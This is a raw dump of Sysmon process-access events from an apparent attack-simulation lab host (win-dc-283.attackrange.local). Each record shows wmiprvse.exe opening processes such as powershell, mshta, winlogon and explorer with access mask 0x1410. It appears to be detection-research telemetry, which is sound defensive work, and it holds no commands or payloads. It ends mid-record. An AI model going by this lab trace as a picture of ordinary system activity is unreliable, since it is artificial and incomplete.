15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3706-00000000A301}5124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5355-6008-3506-00000000A301}6812C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program 